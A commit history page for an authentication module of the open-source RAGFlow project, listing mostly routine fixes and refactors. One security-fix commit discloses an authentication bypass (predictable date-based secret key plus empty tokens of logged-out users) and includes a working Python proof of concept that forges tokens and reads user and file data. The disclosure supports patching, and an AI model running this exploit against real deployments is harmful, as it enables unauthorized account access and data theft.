ragflow

mirror of https://github.com/infiniflow/ragflow.git synced 2026-05-21 00:36:43 +08:00

Author	SHA1	Message	Date
jony376	46897d6fa4	Fix: bind memory message `user_id` to authenticated user for JWT auth (#14745 ) ### Related issues Closes #14744 ### What problem does this PR solve? The Memory REST endpoint `POST /api/v1/messages` previously persisted whatever `user_id` the client sent in the JSON body. Memory rows were therefore attributed to an arbitrary string, even when the caller authenticated as a normal workspace user via JWT (browser/session-style bearer token decoded into an access token). That broke attribution and audit semantics for shared memories (team visibility): any authorized writer could spoof another subject id. The Python SDK already sends an optional `user_id` for integrations using API keys (`APIToken`) to tag an external subject distinct from the tenant owner user. ### Solution - Record `g.auth_via_api_token` in `_load_user` (`api/apps/__init__.py`): set `True` only when authentication resolves via `APIToken`, otherwise `False` after JWT-based login succeeds. - In `POST /messages` (`memory_api.add_message`): if the request was authenticated with an API key, keep accepting optional `user_id` from the body (default empty string). For JWT-authenticated users, always set stored `user_id` to `current_user.id` and ignore the client field. - Guard reads of `g` with `RuntimeError` handling so isolated imports or tests without a Quart application context do not fail when resolving `user_id`. - Document on `RAGFlow.add_message` that `user_id` is only meaningful for API-key authentication. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) - [ ] New Feature (non-breaking change which adds functionality) - [ ] Documentation Update - [ ] Refactoring - [ ] Performance Improvement - [ ] Other (please describe): ### Testing - `python -m py_compile` on modified modules (`api/apps/__init__.py`, `api/apps/restful_apis/memory_api.py`). 
- Recommended: run web/SDK memory message tests (`test_add_message`, `test_message_routes_unit`) against a full environment with `quart` and configured services. ### Notes for reviewers - Behavior change only for callers using JWT-style authorization on `POST /messages`; API-key callers keep prior optional `user_id` semantics. Co-authored-by: jony376 <jony376@gmail.com> Co-authored-by: Cursor <cursoragent@cursor.com>	2026-05-11 13:26:05 +08:00
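The rule described in this commit (API-key callers may tag an external subject, JWT callers are always bound to their own id) can be sketched in a few lines. This is a minimal illustration, not the code from `memory_api.add_message`: `AuthContext` and `resolve_message_user_id` are hypothetical names standing in for the request-scoped `g.auth_via_api_token` flag and `current_user.id`.

```python
from dataclasses import dataclass


@dataclass
class AuthContext:
    """Hypothetical stand-in for request state (`g.auth_via_api_token`, `current_user.id`)."""
    auth_via_api_token: bool
    current_user_id: str


def resolve_message_user_id(ctx: AuthContext, body: dict) -> str:
    """Decide which user_id is stored with a memory message."""
    if ctx.auth_via_api_token:
        # API-key integrations may tag an external subject; default to "".
        return body.get("user_id", "")
    # JWT-authenticated users cannot choose the subject: ignore the body field.
    return ctx.current_user_id


jwt_caller = AuthContext(auth_via_api_token=False, current_user_id="user-1")
api_caller = AuthContext(auth_via_api_token=True, current_user_id="tenant-owner")

print(resolve_message_user_id(jwt_caller, {"user_id": "someone-else"}))
print(resolve_message_user_id(api_caller, {"user_id": "external-42"}))
```

Keeping the decision in one small function makes the spoofing case easy to test without a running application context.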
Mehmet Karakose	7ec87f7cb7	fix(auth): fall back to session-based auth in _load_user (#14569 ) ## Summary Closes #13663. OAuth / OIDC callbacks call `login_user(user)` which writes `_user_id` into the session cookie, but `_load_user()` in `api/apps/__init__.py` only ever looked at the `Authorization` header. The SPA's response interceptor wipes the Authorization value from `localStorage` on the first 401 it sees — meaning that during the post-redirect window after an OAuth login, a single transient 401 sends every subsequent request back to the login page even though `login_user()` had already established a perfectly good server-side session. The reporter's analysis traces this all the way through the redirect → `navigate('/')` → first request → empty header → 401 → `removeAll()` → infinite-redirect-to-login chain. ## What changed - New `_load_user_from_session()` helper that reads `session["_user_id"]`, looks up the user in `UserService` (with the same `StatusEnum.VALID` and `access_token` checks already used elsewhere), and assigns `g.user`. - Every `return None` path in `_load_user()` now routes through that helper before giving up: - missing `Authorization` header - malformed `bearer ` prefix - empty / too-short JWT payload - JWT signature failure - JWT-resolved user not found / has no `access_token` - `APIToken.query()` fallback exhausted The JWT and API-token paths still take precedence — the session is only consulted when those can't authenticate the request. So existing local-login and SDK callers see no behaviour change; only OAuth / OIDC users that hit the original race now stay logged in. The Bearer-prefix issue called out in #13663 (lines 103-110) is already handled in the current code, so this PR only addresses the second half of the report. 
## Test plan - [ ] Configure OIDC under `oauth` in `service_conf.yaml` - [ ] Click the OIDC login button, complete auth at the IdP - [ ] Confirm that navigating between pages no longer bounces back to `/login` - [ ] Confirm local email/password login still issues + accepts JWTs - [ ] Confirm SDK/API key callers still authenticate via `Authorization: Bearer <api-token>` --------- Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2026-05-11 09:59:52 +08:00
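The lookup order this commit describes (JWT first, then API token, then the session cookie as a last resort) can be sketched as below. It is a simplified model under stated assumptions: the three lookup callables are hypothetical placeholders for the JWT decoding, `APIToken.query()` and `UserService` lookups, and the validity checks mentioned above are omitted.

```python
from typing import Callable, Mapping, Optional

Lookup = Callable[[str], Optional[str]]


def _strip_bearer(value: str) -> str:
    """Drop an optional 'Bearer ' prefix from an Authorization value."""
    parts = value.split(None, 1)
    if len(parts) == 2 and parts[0].lower() == "bearer":
        return parts[1].strip()
    return value.strip()


def load_user(
    authorization: Optional[str],
    session: Mapping[str, str],
    by_jwt: Lookup,
    by_api_token: Lookup,
    by_session_id: Lookup,
) -> Optional[str]:
    """Return the authenticated user, or None if every path fails."""
    if authorization:
        token = _strip_bearer(authorization)
        if token:
            # Header-based paths keep precedence over the session.
            user = by_jwt(token) or by_api_token(token)
            if user is not None:
                return user
    # Fallback: a session established by login_user() during OAuth/OIDC.
    user_id = session.get("_user_id")
    if user_id:
        return by_session_id(user_id)
    return None


jwt_users = {"jwt-abc": "alice"}
api_users = {"key-123": "integration"}
session_users = {"u42": "bob"}

# A stale header no longer locks out a user with a valid session.
print(load_user("Bearer stale", {"_user_id": "u42"},
                jwt_users.get, api_users.get, session_users.get))
```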
Jin Hai	1d0519d025	Fix secret key inconsistency across the RAGFlow servers (#14591 ) ### What problem does this PR solve? Consider two API servers, A and B, sharing one Redis server. If A and Redis restart, B still holds the obsolete secret key, which leads to errors. TODO: `app.config['SECRET_KEY']` and `app.secret_key` still hold the obsolete secret key. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --------- Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2026-05-07 10:10:02 +08:00
Wang Qi	b684c89950	Add backward compat APIs (#14427 ) ### What problem does this PR solve? Add backward compat APIs: ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2026-04-29 15:15:49 +08:00
Lynn	655dd2f8c6	Fix: simplify _load_user (#14154 ) ### What problem does this PR solve? Simplify _load_user, remove unused fallback. ### Type of change - [x] Refactoring	2026-04-16 18:47:43 +08:00
Jin Hai	e2b879b258	Fix tiny issues (#14006 ) ### What problem does this PR solve? As title ### Type of change - [x] Refactoring <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * Chores * Improved authentication error logging to better distinguish between JWT and API token failures. * Enhanced code documentation with clarifying comments for better maintainability. <!-- end of auto-generated comment: release notes by coderabbit.ai --> Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2026-04-09 19:01:36 +08:00
qinling0210	49386bc1b5	Implement UpdateDataset and UpdateMetadata in GO (#13928 ) ### What problem does this PR solve? Implement UpdateDataset and UpdateMetadata in GO Add cli: UPDATE CHUNK <chunk_id> OF DATASET <dataset_name> SET <update_fields> REMOVE TAGS 'tag1', 'tag2' from DATASET 'dataset_name'; SET METADATA OF DOCUMENT <doc_id> TO <meta> ### Type of change - [ ] Refactoring	2026-04-07 09:44:51 +08:00
OliverW	3ed91345aa	fix(auth): return HTTP 401 for token-auth failures (#13420 ) Follow-up to #12488 #13386 ### What problem does this PR solve? Previously, token authentication failures returned HTTP 200 with an error code in the response body. This PR updates `token_required` to raise `Unauthorized` and relies on the global error handler to return a structured JSON response with HTTP 401 status. The response body structure (`code`, `message`, `data`) remains unchanged to preserve compatibility with the official SDK. Frontend logic has been updated to handle HTTP 401 responses in addition to checking `data.code`. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2026-03-06 18:18:14 +08:00
Lynn	30d5fc1a07	Refactor: split memory API into gateway and service layers (#13111 ) ### What problem does this PR solve? Decouple the memory API into a gateway layer (for routing/param parse) and a service layer (for business logic). ### Type of change - [x] Refactoring	2026-02-12 10:11:50 +08:00
6ba3i	2b20d0b3bb	Fix : Web API tests by normalizing errors, validation, and uploads (#12620 ) ### What problem does this PR solve? Fixes web API behavior mismatches that caused test failures by normalizing error responses, tightening validations, correcting error messages, and closing upload file handles. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2026-01-16 11:09:22 +08:00
6ba3i	0795616b34	Align p3 HTTP/SDK tests with current backend behavior (#12563 ) ### What problem does this PR solve? Updates pre-existing HTTP API and SDK tests to align with current backend behavior (validation errors, 404s, and schema defaults). This ensures p3 regression coverage is accurate without changing production code. ### Type of change - [x] Other (please describe): align p3 HTTP/SDK tests with current backend behavior --------- Co-authored-by: Liu An <asiro@qq.com>	2026-01-13 19:22:47 +08:00
Haiyang.Pu	6abf55c048	Feat: support openapi (#12521 ) ### What problem does this PR solve? Support OpenAPI interface description. The issue of not supporting the Swagger interface after upgrading the system framework from Flask to Quart has been resolved. Resolved https://github.com/infiniflow/ragflow/issues/5264 ### Type of change - [x] New Feature (non-breaking change which adds functionality) --------- Co-authored-by: puhaiyang <“761396462@qq.com”>	2026-01-09 17:48:20 +08:00
Lynn	bdd9f3d4d1	Fix: try to handle authorization as api-token (#12462 ) ### What problem does this PR solve? Try to handle the `Authorization` value as an API token when JWT loading fails. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2026-01-06 19:25:42 +08:00
Jin Hai	c20d112f60	Print log (#12200 ) ### What problem does this PR solve? Print invalid URL --------- Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-12-25 16:59:05 +08:00
Jin Hai	993bf7c2c8	Fix IDE warnings (#12085 ) ### What problem does this PR solve? As title ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-12-22 16:47:21 +08:00
Magicbook1108	7db9045b74	Feat: Add box connector (#11845 ) ### What problem does this PR solve? Feat: Add box connector ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-12-12 10:23:40 +08:00
Jin Hai	43f51baa96	Fix errors (#11804 ) ### What problem does this PR solve? 1. typos 2. grammar errors. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-12-08 12:21:18 +08:00
Yongteng Lei	b6c4722687	Refa: make RAGFlow more asynchronous (#11601 ) ### What problem does this PR solve? Try to make this more asynchronous. Verified in chat and agent scenarios, reducing blocking behavior. #11551, #11579. However, the impact of these changes still requires further investigation to ensure everything works as expected. ### Type of change - [x] Refactoring	2025-12-01 14:24:06 +08:00
dzikus	9a8ce9d3e2	fix: increase Quart RESPONSE_TIMEOUT and BODY_TIMEOUT for slow LLM responses (#11612 ) ### What problem does this PR solve? Quart framework has default RESPONSE_TIMEOUT and BODY_TIMEOUT of 60 seconds. This causes the frontend chat to hang exactly after 60 seconds when using slow LLM backends (e.g., Ollama on CPU, or remote APIs with high latency). This fix adds configurable timeout settings via environment variables with sensible defaults (600 seconds = 10 minutes) to match other timeout configurations in RAGFlow. Fixes issues with chat timeout when: - Using local Ollama on CPU (response time ~2 minutes) - Using remote LLM APIs with high latency - Processing complex RAG queries with many chunks ### Type of change - [X] Bug Fix (non-breaking change which fixes an issue) Co-authored-by: Grzegorz Sterniczuk <grzegorz@sternicz.uk>	2025-12-01 11:26:34 +08:00
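Reading such timeouts from the environment with a 600-second default might look like the sketch below. The environment variable names `EXAMPLE_RESPONSE_TIMEOUT` and `EXAMPLE_BODY_TIMEOUT` are placeholders chosen for illustration, since the commit message does not name the actual variables; only the `RESPONSE_TIMEOUT` and `BODY_TIMEOUT` config keys and the 600-second default come from the text above.

```python
import os
from typing import Mapping

DEFAULT_TIMEOUT_SECONDS = 600  # 10 minutes, the default stated in the commit


def read_timeout(env_name: str, environ: Mapping[str, str] = os.environ,
                 default: int = DEFAULT_TIMEOUT_SECONDS) -> int:
    """Parse a positive integer timeout, falling back to the default."""
    raw = environ.get(env_name)
    if raw is None or not raw.strip():
        return default
    try:
        value = int(raw)
    except ValueError:
        return default
    return value if value > 0 else default


def timeout_config(environ: Mapping[str, str] = os.environ) -> dict:
    """Build the two timeout settings (env var names are hypothetical)."""
    return {
        "RESPONSE_TIMEOUT": read_timeout("EXAMPLE_RESPONSE_TIMEOUT", environ),
        "BODY_TIMEOUT": read_timeout("EXAMPLE_BODY_TIMEOUT", environ),
    }


print(timeout_config({"EXAMPLE_RESPONSE_TIMEOUT": "120"}))
```

Falling back to the default on malformed or non-positive values is a design choice made here so that a bad setting cannot reintroduce a too-short timeout.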
Kevin Hu	249296e417	Feat: API supports toc_enhance. (#11437 ) ### What problem does this PR solve? Close #11433 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-11-21 14:51:58 +08:00
Kevin Hu	d1716d865a	Feat: Alter flask to Quart for async API serving. (#11275 ) ### What problem does this PR solve? #11277 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-11-18 17:05:16 +08:00
Jin Hai	70a0f081f6	Minor tweaks (#11249 ) ### What problem does this PR solve? Fix some IDE warnings ### Type of change - [x] Refactoring --------- Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-11-13 16:11:07 +08:00
Jin Hai	f98b24c9bf	Move api.settings to common.settings (#11036 ) ### What problem does this PR solve? As title ### Type of change - [x] Refactoring --------- Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-11-06 09:36:38 +08:00
Jin Hai	bab3fce136	Move some constants to common (#11004 ) ### What problem does this PR solve? As title. ### Type of change - [x] Refactoring --------- Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-11-05 08:01:39 +08:00
Billy Bao	55eb525fdc	Feat: rename file to avoid package name conflict (#10863 ) ### What problem does this PR solve? Feat: rename file to avoid package name conflict ### Type of change - [x] Refactoring	2025-10-29 12:19:57 +08:00
Jin Hai	b0b866c8fd	Refactor: move some functions out of api/utils/__init__.py (#10216 ) ### What problem does this PR solve? Refactor import modules. ### Type of change - [x] Refactoring --------- Signed-off-by: jinhai <haijin.chn@gmail.com> Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-09-25 18:04:49 +08:00
Yongteng Lei	99df0766fe	Feat: add SMTP support for user invitation emails (#9479 ) ### What problem does this PR solve? Add SMTP support for user invitation emails ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-08-15 18:12:20 +08:00
Gecko Security	de89b84661	Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998 )
### Description
There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system.
The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls.
### Source - Sink Analysis
Source (User Input): HTTP Authorization header containing attacker-controlled JWT token
Flow Path:
1. Entry Point: `load_user()` function in `api/apps/__init__.py` (Line 142)
2. Token Processing: JWT token extracted from Authorization header
3. Secret Key Usage: Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123)
4. Database Query: `UserService.query()` called with decoded empty access_token
5. Sink: Authentication succeeds, returning first user with empty access_token
### Proof of Concept
```python
import requests
from datetime import date
from itsdangerous.url_safe import URLSafeTimedSerializer
import sys

def exploit_ragflow(target):
    # Generate token with predictable key
    daily_key = str(date.today())
    serializer = URLSafeTimedSerializer(secret_key=daily_key)
    malicious_token = serializer.dumps("")
    print(f"Target: {target}")
    print(f"Secret key: {daily_key}")
    print(f"Generated token: {malicious_token}\n")
    # Test endpoints
    endpoints = [
        ("/v1/user/info", "User profile"),
        ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing")
    ]
    auth_headers = {"Authorization": malicious_token}
    for path, description in endpoints:
        print(f"Testing {description}...")
        response = requests.get(f"{target}{path}", headers=auth_headers)
        if response.status_code == 200:
            data = response.json()
            if data.get("code") == 0:
                print(f"SUCCESS {description} accessible")
                if "user" in path:
                    user_data = data.get("data", {})
                    print(f" Email: {user_data.get('email')}")
                    print(f" User ID: {user_data.get('id')}")
                elif "file" in path:
                    files = data.get("data", {}).get("files", [])
                    print(f" Files found: {len(files)}")
            else:
                print(f"Access denied")
        else:
            print(f"HTTP {response.status_code}")
        print()

if __name__ == "__main__":
    target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost"
    exploit_ragflow(target_url)
```
Exploitation Steps:
1. Deploy RAGFlow with default configuration
2. Create a user and make at least one user log out (creating empty access_token in database)
3. Run the PoC script against the target
4. Observe successful authentication and data access without any credentials
Version: 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>	2025-06-05 12:10:24 +08:00
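The two flaws in this report suggest two defensive checks, sketched below with the standard library only. This is an illustration of the general remedy, not the patch from this PR: `random_secret`, `is_usable_access_token` and the minimum length of 32 are hypothetical choices, while `predictable_secret` reproduces the weak `str(date.today())` default quoted above.

```python
import secrets
from datetime import date
from typing import Optional


def predictable_secret() -> str:
    """The weak default described in the report: guessable from the calendar."""
    return str(date.today())


def random_secret() -> str:
    """A secret an attacker cannot derive: 32 random bytes as 64 hex characters."""
    return secrets.token_hex(32)


def is_usable_access_token(access_token: Optional[str], min_length: int = 32) -> bool:
    """Reject empty or too-short tokens before any user lookup.

    The min_length of 32 is an assumption made for this sketch.
    """
    return bool(access_token) and len(access_token.strip()) >= min_length


# A logged-out user's empty access_token must never match a lookup.
print(is_usable_access_token(""))
print(len(random_secret()))
```

Checking the decoded token before querying the user table closes the empty-string match even if a signing key were to leak.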
donblack01	115850945e	Fix: When you create a new API module named xxxa_api, the access route becomes xxx instead of xxxa. For example, a new API module named 'data_api' gets the access route 'dat' instead of 'data' (#7325 ) ### What problem does this PR solve? Fix: When you create a new API module named xxxa_api, the access route becomes xxx instead of xxxa. For example, a new API module named 'data_api' gets the access route 'dat' instead of 'data'. Fix: A new knowledge base was not renamed when a knowledge base with the same name already existed. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) --------- Co-authored-by: tangyu <1@1.com> Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-05-20 09:39:26 +08:00
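The symptom in this commit ('data_api' becoming 'dat') matches a common Python pitfall: `str.rstrip` removes a set of characters, not a suffix. Whether the original code used `rstrip` is an assumption, as the commit message does not show the diff; the function names below are hypothetical and only demonstrate the pitfall and one safe alternative.

```python
SUFFIX = "_api"


def page_name_buggy(module_name: str) -> str:
    """Strips any trailing run of the characters '_', 'a', 'p', 'i'."""
    return module_name.rstrip(SUFFIX)


def page_name_fixed(module_name: str) -> str:
    """Removes the literal '_api' suffix only when it is present."""
    if module_name.endswith(SUFFIX):
        return module_name[: -len(SUFFIX)]
    return module_name


print(page_name_buggy("data_api"))  # 'dat': the trailing 'a' of 'data' is eaten too
print(page_name_fixed("data_api"))  # 'data'
```

Names such as `user_api` hide the bug because `r` is not in the stripped character set, which is why it only shows up for modules whose base name ends in one of those characters.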
Kevin Hu	a6ab2c71c3	Refa: enlarge default max request body size. (#6088 ) ### What problem does this PR solve? ### Type of change - [x] Refactoring	2025-03-14 15:21:08 +08:00
hy89	7b5d831296	Fix: Starting the source code on Windows, the 'HTTP API' returns 404 (#5042 ) Fix: When starting the backend service from source code on Windows, the "HTTP API" no longer returns 404.	2025-02-17 19:33:49 +08:00
Kevin Hu	4ba4f622a5	Refactor (#4303 ) ### What problem does this PR solve? ### Type of change - [x] Refactoring	2024-12-31 14:31:31 +08:00
Jin Hai	70cd5c1599	Remove unused code (#3448 ) ### What problem does this PR solve? 1. Remove unused code. 2. Move some codes from settings to constants ### Type of change - [x] Refactoring --------- Signed-off-by: jinhai <haijin.chn@gmail.com>	2024-11-18 12:05:38 +08:00
Jin Hai	1e90a1bf36	Move settings initialization after module init phase (#3438 ) ### What problem does this PR solve? 1. Module init won't connect database any more. 2. Config in settings need to be used with settings.CONFIG_NAME ### Type of change - [x] Refactoring Signed-off-by: jinhai <haijin.chn@gmail.com>	2024-11-15 17:30:56 +08:00
Zhichang Yu	30f6421760	Use consistent log file names, introduced initLogger (#3403 ) ### What problem does this PR solve? Use consistent log file names, introduced initLogger ### Type of change - [ ] Bug Fix (non-breaking change which fixes an issue) - [ ] New Feature (non-breaking change which adds functionality) - [ ] Documentation Update - [x] Refactoring - [ ] Performance Improvement - [ ] Other (please describe):	2024-11-14 17:13:48 +08:00
Zhichang Yu	a2a5631da4	Rework logging (#3358 ) Unified all log files into one. ### What problem does this PR solve? Unified all log files into one. ### Type of change - [x] Refactoring	2024-11-12 17:35:13 +08:00
Matej Horník	dd1146ec64	feat: docs for api endpoints to generate openapi specification (#3109 ) ### What problem does this PR solve? Added openapi specification for API routes. This creates swagger UI similar to FastAPI to better use the API. Using python package `flasgger` ### Type of change - [x] New Feature (non-breaking change which adds functionality) Not all routes are included since this is a work in progress. Docs can be accessed on: `{host}:{port}/apidocs`	2024-11-04 15:35:36 +08:00
liuhua	cbd7cd7c4d	Refactor Dataset API (#2783 ) ### What problem does this PR solve? Refactor Dataset API ### Type of change - [x] Refactoring --------- Co-authored-by: liuhua <10215101452@stu.ecun.edu.cn>	2024-10-11 09:55:27 +08:00
Kevin Hu	863cec1bad	prepare for sdk http api (#2075 ) ### What problem does this PR solve? #1605 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2024-08-23 19:36:17 +08:00
Jin Hai	6b3a40be5c	Convert file format from Windows/DOS to Unix (#1949 ) ### What problem does this PR solve? The affected source files were in Windows/DOS format; they are converted to Unix format. ### Type of change - [x] Refactoring Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2024-08-15 09:17:36 +08:00
zhuhao	792a1a9d91	add password reset function by extending the Flask command (#1632 ) ### What problem does this PR solve? add password reset function by extending the Flask command. #1200 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2024-07-23 14:02:41 +08:00
KevinHuSh	abcd3d2469	refactor (#1124 ) ### What problem does this PR solve? ### Type of change - [x] Refactoring	2024-06-12 11:02:15 +08:00
Jin Hai	cf2f6592dd	API: create dataset (#1106 ) ### What problem does this PR solve? This PR implements 'create dataset' for both the HTTP API and the Python SDK.
HTTP API:
```
curl --request POST --url http://<HOST_ADDRESS>/api/v1/dataset --header 'Content-Type: application/json' --header 'Authorization: <ACCESS_KEY>' --data-binary '{ "name": "<DATASET_NAME>" }'
```
Python SDK:
```
from ragflow.ragflow import RAGFLow
ragflow = RAGFLow('<ACCESS_KEY>', 'http://127.0.0.1:9380')
ragflow.create_dataset("dataset1")
```
TODO: - ACCESS_KEY is currently the login token issued when a user logs in to RAGFlow. RAGFlow should let users add and delete access keys. ### Type of change - [x] New Feature (non-breaking change which adds functionality) - [x] Documentation Update --------- Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2024-06-11 11:16:37 +08:00
KevinHuSh	b8e58fe27a	add redis to accelerate access of minio (#482 ) ### What problem does this PR solve? ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2024-04-22 14:11:09 +08:00
KevinHuSh	c39b751600	conversation API backend update (#360 ) ### What problem does this PR solve? Issue link:#345 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2024-04-15 14:43:44 +08:00
wenzhuo zhan	d0ff779d3f	issue 341_Update __init__.py (#344 ) ### What problem does this PR solve? Issue link:#341 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2024-04-13 12:01:21 +08:00
KevinHuSh	91068edf16	Support Xinference (#320 ) ### What problem does this PR solve? Issue link:#299 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2024-04-11 18:22:25 +08:00
KevinHuSh	f1f09df901	add local llm implementation (#119 )	2024-03-12 11:57:08 +08:00
KevinHuSh	407b2523b6	remove unused code, separate layout detection out as a new API. Add new RAG method 'table' (#55 )	2024-02-05 18:08:17 +08:00
KevinHuSh	484e5abc1f	LLM configuration refine and trievalTest API refine (#40 )	2024-01-19 19:51:57 +08:00

52 Commits